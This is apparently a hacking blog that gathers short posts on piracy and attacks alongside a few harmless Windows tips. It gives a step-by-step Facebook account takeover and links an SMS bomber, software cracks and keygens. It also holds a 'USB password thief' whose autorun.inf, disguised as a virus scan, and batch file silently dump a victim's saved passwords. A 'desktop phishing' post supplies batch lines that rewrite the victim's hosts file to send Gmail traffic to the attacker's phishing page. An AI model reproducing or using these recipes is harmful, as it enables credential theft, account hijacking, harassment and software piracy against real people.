0 Comments
Posted in Arrangement, Art, Business

All in One Program Key Generator

I earlier posted about how to find key for any program from Internet.If you haven't read it yet Click Here.
In this post I am making the things more easier.I found the program while searching in Hackers Forum.
The program will generate product keys for:
  1. Adobe Photoshop CS4
  2. Adobe Dreamviewer CS4
  3. Nero 9
  4. Virtual DJ
  5. Kaspersky Internet Security 2009
  6. Windows XP,VISTA 
and even more.
To download the program Click Here.
What you have to do is just select the program from the Drop Down List And Click Generate.Thats it !!!!!!!
Have any doubts Comment Here!
0 Comments
Posted in Arrangement, Art, Business

Make Online Calls Over The Internet Using Voixio

I this post I will show you how to make free calls over Internet using Voixio.This is a website which supports video calls with quality for free.I made enough easy and free calls to my personal phone and my office.
It has no quality as that of the telephone but when compared with Skype it provides equal quality as that of Skype.Like Skype if you possess a good headset then you can have the quality of Skype.
What is also good about the Voixio system is it supports video, this means you can have a video chat with other Voixio users or even with 3G mobile phone users. I was unable to try either of these so cannot comment on the quality, but it seems very cool!
Features:-
  • Nothing to install.
  • Login from any computer using a webpage  and make free calls.
  • No delay,no echo voice or noise.
  • 1 hour free video conferencing per day.
  • 10 minutes free International Calling per day.
  • Top-up SIP and conferencing credit for just 1 cent for 5 minutes
So here you have the site which have all the things you need.To check this out Click Here (Go to VoiXio) 

0 Comments
Posted in Arrangement, Art, Business

How to activate GodMode in Vista/Windows 7

In this post I will show you how to Activate GodMode In Vista/7
WHAT IS GODMODE
Windows 7's so-called GodMode is actually a shortcut to accessing the operating system's various control settings.
Although its name suggests perhaps even grander capabilities, Windows enthusiasts are excited over the discovery of a hidden "GodMode" feature that lets users access all of the operating system's control panels from within a single folder.
By creating a new folder in Windows 7 and renaming it with a certain text string at the end, users are able to have a single place to do everything from changing the look of the mouse pointer to making a new hard-drive partition. 
LETS START
  1. On the desktop right click and make a new Folder.
  2. Rename the folder to "GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"(without quotes)
  3. You can also  change the name to any other.
  4. Suddenly the icon changes and you have access to all God Mode options.
Note:-This works perfect on Windows 32 bit.But I am not sure about 64 Bit.
0 Comments
Posted in Arrangement, Art, Business

Request A New IP From your ISP

In this post  I will show you how to request a  new IP from your ISP.
To know what an IP is Click Here(source WIKIPEDIA).
IP address is vulnerable to many attacks,also it's so powerful.The IP is used to track the unauthorized activities done online by  a computer.Usage of Hide My Ip can hide your IP.
But anyway I shall show you how to Request A New IP from your ISP. 
LETS START
  1. Click Start.
  2. Click Run.
  3. In the run box type cmd and click OK.(Or select Command Prompt from Accessories.
  4. When command prompt opens type in the following*Press 'enter' after each line.                              
                                          ipconfig /flushdns
                                          ipconfig /release
                                          ipconfig /renew
                                             exit
5.Make sure that you erase all the cookies in whatever browser you are using.


"Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it."
Feel free to Contact Us
0 Comments
Posted in Arrangement, Art, Business

Hack Facebook In 6 easy Steps(Don't Misuse)

In this post I will show you How to Hack Facebook Account with just 6 steps.I request you not misuse this method because this can be tracked easily and you might be easily caught.Any way keeping these things we can start.
Before all the things make sure that you create a similar email address like the one of your victim.Eg:-If your going to hack Jhonxxxxxx@gmail .com
then create a similar email address like Jhonxxxxxx@yahoo.com/reddifmail.com etc.
Follow These Steps
  1. Go to www.facebook.com.
  2. Click on Forgot Passwod Option.
  3. Type in the victims id in the"Enter Email or Phone Number" box.
  4. Click Search.
  5. In the next box Click I have no longer access to these.
  6. After clicking a new page asking you to enter new e-mail address.Input your email address here and click Submit.
  7. This step completely depends on your luck.Try an answer here .
  8. After entering answer 3 times you will be redirected to another page .
  9. In the next page click continue and then choose three friend of you who will help you in hacking the victims password. Note: These friends should be the victims friends too.You can be also one of the friend.
  10. Then after you submit three friends they will receive a security code they need to give it to you.
  11. After you enter codes you are done now you can access the victims account.
0 Comments
Posted in Arrangement, Art, Business

Send SMS Anonymously In India (ONLY)

Sending SMS is the cheapest way of conveying  message from one to other.Thats always good.We have many sites like Way 2 Sms and Full on Sms to help you send FREE SMS any where.It has many features too.
But think  a case where you need to hide your number but still send free sms..............That's possible as long as Smsti keep up the website.........
LETS START
It has the following features:
  • Free Sms
  • No Registration or Login  required
  • 160 characters per sms
  • Check Delivery Status Real Time
  • No ads along with sms
  • High speed delivery system
STEPS TO SEND SMS
  • Visit this website: Smsti
  • Write the victim's phone number and message
  • Then click on Send
  • You will be asked to write the words which you will see in a picture, provide them these words correctly
  • Finally Click on 'Agree to Terms'
That's all .The sms will be sent by their system without disclosing your number to the recipient.
BE HAPPY :) 
0 Comments
Posted in Arrangement, Art, Business

BOMB MOBILE PHONE WITH SMS

The program  I will be using here is Beaver's Sms Bomber Pro .This tool will bomb your victims mobile phone with Sms.Its having an easy interface.....If you don't find the operator in the list you can choose the "CUSTOM" option and just enter the number.Then enjoy with the sfotware.....NOTE:-I am not responsible for anything.The details are only for Education....
To Download Click Here  .
0 Comments
Posted in Arrangement, Art, Business

FIND KEY FOR ANY PROGRAM FROM INTERNET

This summary is not available. Please click here to view the post.
0 Comments
Posted in Arrangement, Art, Business

Hack Any Programs to Use it For Ever !!!!!!

Hi ,I am back here with a useful infomation for all.Today we use many softwares both which we have to pay and some are free.But the OS i use right now is windows 7.I have to give some money to Microsoft for getting this.
Here I will use a tool known as RunAsDate..

Lets Start
1)Download RunAsDate from here (Click Here).
2)Note down the time and date,when you installed the sfotware.
3)Once the trial period is over,make sure that you always runs it through RunAsDate.
4)After the trial period is over do not run the program directly.If you do so even once this trick WILL NOT work.
5)It is always better and safe to inject date of the last day in the trial period.
             For example, if the trial period expires on oct 1 2009, always inject the date as sep 30 2009 in   the      RunAsDate.

Warning : AVG Antivirus reports that RunAsDate is infected with "Trojan horse Generic 10.Thk". This will not harm ur pc,warning is just bcoz this is a wondow registry hack tool !
0 Comments
Posted in Arrangement, Art, Business

USB PASSWORD THIEF

Today I will show you how you can get the password from your friends using a USB Thief,actually a rootkit for Hacking.This will be done through using a combination of various softwares.All the tools will be needed to get your victims Password.But note that This rootkit will only steal those passwords which are stored in the OS.
I feel that this Introduction is enough...
LETS START
1)You will need various softwares for this purpose.We shall see this in section.
1 (i) >MessenPass :-MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
  • MSN Messenger,Windows Messenger (In Windows XP),Windows Live Messenger (In Windows XP/Vista/7),Yahoo Messenger (Versions 5.x and 6.x),Google Talk,ICQ Lite 4.x/5.x/2003,AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro,Trillian,Trillian Astra,Miranda,GAIM/Pidgin, MySpace IM,PaltalkScene,Digsby.
  • MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.                                
  • >(ii)Mail PassView:-Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.


 (iii)>IE Passview:-IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don't need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 9.0.
For each password that is stored by Internet Explorer, the following information is displayed: Web address, Password Type (AutoComplete, Password-Protected Web Site, or FTP), Storage Location (Registry, Credentials File, or Protected Storage), and the user name/password pair. You can select one or more items from the passwords list and export them into text/html/csv/xml file. 


(iv)> Protected Storage PassView:-Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
Starting from version 1.60, this utility reveals all AutoComplete strings stored in Internet Explorer, not only the AutoComplete password, as in the previous versions.
This utility can show 4 types of passwords:
  1. Outlook passwords: When you create a mail account in Outlook Express or a POP3 account in Microsoft Outlook, and you choose the "Remember password" option in the account properties, the password is saved in the Protected Storage, and this utility can instantly reveal it.
    Be aware that if delete an existing Outlook Express account, the password won't be removed from the Protected Storage. In such a case, the utility won't be able to obtain the user-name of the deleted account, and only the password will be shown.
    Starting from version 1.50, the passwords of Outlook Express identities are also displayed.
  2. AutoComplete passwords in Internet Explorer: Many Web sites provides you a logon screen with user-name and password fields. When you log into the Web site, Internet Explorer may ask you if you want to remember the password for the next time that you log into this Web site. If choose to remember the password, the user-name and the password are saved in the Protected Storage, and thus they can be revealed by Protected Storage PassView.
    In some circumstances, multiple pairs of user-name and passwords are stored for the same logon window. In such case, the additional passwords will be displayed as sub-items of the first user-password pair. In sub-items, the resource name is displayed as 3 dots ('...')
  3. Password-protected sites in Internet Explorer: Some Web sites allows you to log on by using "Basic Authentication" or "Digest Access Authentication". When you enter the Web site, Internet Explorer displays a special logon dialog-box and asks you to enter your user-name and password. Internet Explorer also gives you the option to save the user-name/password pair for the next time you log-on. If you choose to save the logon data, the user-name and the password are saved in the Protected Storage, and thus they can be revealed by Protected Storage PassView.
    In this category, you can also find the passwords of FTP servers.
  4. MSN Explorer Passwords:
    The MSN Explorer browser stores 2 types of passwords in the Protected Storage:
    • Sign-up passwords
    • AutoComplete passwords

By default, this utility shows all 4 types of passwords. You can select to show or hide a specific type of password, by choosing the right password type from the View menu. 

 (v)>PasswordFox: - PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 

Now you are ready to attack your selected Victim......

BUT YOU NEED SOME MORE THINGS TO PLAY THE TRICK ON

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.(you Can download all ready files here itself)    Click Here(only exe ) Click here(notepad files).
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7


Hope You Like This ....Why Dont You Try It Out Now

0 Comments
Posted in Arrangement, Art, Business

DESKTOP PHISHING


I earlier posted about phishing,and now extending Phishing to even Desktops.
Lets Start 
In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.
0 Comments
Posted in Arrangement, Art, Business

RAINBOW CRACK FOR HACKING


Can't we hack passwords with Rainbow colors?Yes we can .In this post I will show you the Software Rainbow Crack.
LETS START
1 i)Download Rainbow Cracker Click here (win 32).
  ii)Download Rainbow Cracker Click here (win 64).
2)Extract the file and try using it.
3)Since it have a difficult user interface it is good to ask the company itself.
                                                                         (Find it in Read me file)
Some Facts About Rainbow Crack
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It crack hashes with rainbow tables.
RainbowCrack uses time-memory tradeoff algorithm to crack hashes. It differs from the hash crackers that use brute force algorithm.
A brute force hash cracker generate all possible plaintexts and compute the corresponding hashes on the fly, then compare the hashes with the hash to be cracked. Once a match is found, the plaintext is found. If all possible plaintexts are tested and no match is found, the plaintext is not found. With this type of hash cracking, all intermediate computation results are discarded.
A time-memory tradeoff hash cracker need a pre-computation stage, at the time all plaintext/hash pairs within the selected hash algorithm, charset, plaintext length are computed and results are stored in files called rainbow table. It is time consuming to do this kind of computation. But once the one time pre-computation is finished, hashes stored in the table can be cracked with much better performance than a brute force cracker.
In this RainbowCrack project, we focus on the development of optimized time-memory tradeoff implementation, and generation of large rainbow tables.
Features of latest RainbowCrack software:
  • Full time-memory tradeoff tool suites, including rainbow table generation, sort, conversion and lookup
  • Support rainbow table of any hash algorithm
  • Support rainbow table of any charset
  • Support rainbow table in raw file format (.rt) and compact file format (.rtc)
  • Computation on multi-core processor support
  • Computation on GPU (via NVIDIA CUDA technology) support
  • Computation on multi-GPU (via NVIDIA CUDA technology) support
  • Runs on 32-bit Windows operating systems
    • Windows XP 32-bit
    • Windows Vista 32-bit
    • Windows 7 32-bit
    • ...
  • Runs on 64-bit Windows operating systems
    • Windows XP 64-bit
    • Windows Vista 64-bit
    • Windows 7 64-bit
    • ...
  • Runs on 32-bit Linux operating systems (x86 only)
    • Ubuntu 9.10 32-bit
    • Ubuntu 10.04.1 32-bit
    • Redhat Enterprise Linux 5.5 32-bit
    • openSUSE 11.3 32-bit
    • ...
  • Runs on 64-bit Linux operating systems (x86_64 only)
    • Ubuntu 9.10 64-bit
    • Ubuntu 10.04.1 64-bit
    • Redhat Enterprise Linux 5.5 64-bit
    • openSUSE 11.3 64-bit
  • Unified rainbow table file format on all supported operating systems
  • Command line user interface
  • Graphics user interface (Windows only).
BE HAPPY :)
0 Comments
Posted in Arrangement, Art, Business

2nd BLUETOOTH HACKING SOFTWARE


Earlier I posted about a bluetooth hacking software.For some that may be boring.Can't we try something new?
Many of my friends asked the same question.So with due respect to them I am giving you another Bluetooth hacking software.In this post I will give you another hacking program customized with the help of my Computer Sir.This Post is for him.
If you wish to read the earlier article Click here  .
LETS GET STARTED
1)To download the Bluetooth Hacker Click Here .
2)Install this software on your mobile phone.
3)Make sure that your mobile supports java,as this is created with Java.
4)Open up the app and search the mobile phone round.Sometimes you need to pair the mobile phones.
5)Hack have access to all the details and if the victim is your  enemy,Why dont you call someone and make his balance to"ZERO".
:) BE HAPPY

0 Comments
Posted in Arrangement, Art, Business

BLUETOOTH HACKING SOFTWARE(MOBILES)


Hacking mobile phones was always my dream,sometimes even a craze.While searching for such a software all around my hometown, my computer sir gave me a bluetooth hacker and while looking for a design we just took 
the style of another software.The design was actually not (c).So  In this post i will give u a Bluetooth hacker.
LET US START
1)Download Bluetooth hacker from here.
2)Install this software on your mobile phone.
3)Make sure that your mobile supports java,as this is created with Java.
4)Open up the app and search the mobile phone round.Sometimes you need to pair the mobile phones.
5)Hack have access to all the details and if the victim is your  enemy,Why dont you call someone and make his balance to"ZERO".
:) BE HAPPY

0 Comments
Posted in Arrangement, Art, Business

1000 Hacking Tutorials And Tricks(Hand Picked By Me)


The post here will help you to download 1000 mouthflowing articles on hacking,which includes changing passwords,tips&tricks etc,which was handpicked by me from articles published in 2008.
 1)Download 1000 hacks from here .
2)Extract the zip/rar file.If password is asked juse type "blacksecurity"(without quotes).
3)Have patience to read all the files .The file also includes best hacking books as free E-books.



BE HAPPY :)
0 Comments
Posted in Arrangement, Art, Business

KASPERSKY CRACK(2011)


Download Kaspersky 2011 Internet Security from here
Download Kaspesky 2011 Intenet Security (CRACK) form here.

Key Features

  • Real-time protection against all Internet threats
  • Best-in-class two-way firewall keeps hackers out
  • Cloud-based monitoring of websites and applications
  • Advanced parental controls allow you to limit or log activities and communications
  • Safe Desktop* for opening suspicious programs without risk to your PC
  • Desktop Security Gadget for easy-access to protection status and settings';

MORE ABOUT KASPERSKY
This is the latest version Kaspersky Lab has released. The beta version was released for all windows users on June 8. This version includes a new interface, as well as a gadget only available for Windows Vista and Windows 7 users. PC Mag rated this version "very good" (4/5 stars). Its firewall was noted to be very good, but that made up for its only adequate malware detection rates. Two critical fixes have been released by Kaspersky Lab, making the current version 11.0.2.556



0 Comments
Posted in Arrangement, Art, Business

Microsoft Baseline Security Analyzer

1)Download MBSA from here(x86)
   Download MBSA from here(x64)

SOME FACTS ABOUT MBSA

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings. Security updates are determined by the current version of MBSA using the Windows Update Agent present on Windows computers since Windows 2000 Service Pack 3. The less-secure settings, often called Vulnerability Assessment (VA) checks, are assessed based on a hard-coded set of registry and file checks. An example of a VA might be that permissions for one of the directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.
Versions 1.2.1 and below run on NT4, Windows 2000, Windows XP, and Windows Server 2003, provide support for IIS versions 5 through 6, SQL Server 7 and 2000, Internet Explorer 5.01 and 6.0 only, and Microsoft Office 2000 through 2003. Security update assessment is provided by an integrated version of Shavlik's HFNetChk 3.8 scan tool. MBSA 1.2.1 was localized into English, German, French and Japanese versions and supported security assessment for any locale.
Version 2.0 retained the hard-coded VA checks, but replaced the Shavlik security assessment engine with Microsoft Update technologies which adds dynamic support for all Microsoft products supported by Microsoft Update. MBSA 2.0.1 was released to support the revised Windows Update (WU) offline scan file (WSUSSCN2.CAB). MBSA 2.1 added Vista and Windows Server 2008 support, a new Vista-styled GUI interface, support for the latest Windows Update Agent (3.0), a new Remote Directory (/rd) feature and extended the VA checks to x64 platforms.